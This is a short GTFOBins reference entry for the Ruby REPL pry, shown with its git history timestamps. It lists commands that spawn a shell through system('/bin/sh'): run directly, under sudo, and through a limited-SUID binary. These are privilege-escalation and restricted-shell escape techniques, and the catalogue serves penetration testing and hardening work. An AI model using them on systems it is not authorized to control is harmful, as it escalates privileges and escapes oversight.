GTFOBins.github.io/_gtfobins/pry.md

16 lines
215 B
Markdown
Raw Permalink Normal View History

2020-03-17 08:49:25 +01:00
---
functions:
shell:
- code: |
pry
system("/bin/sh")
sudo:
- code: |
sudo pry
system("/bin/sh")
2020-03-17 20:48:08 +01:00
limited-suid:
- code: |
./pry
system("/bin/sh")
2020-03-17 08:49:25 +01:00
---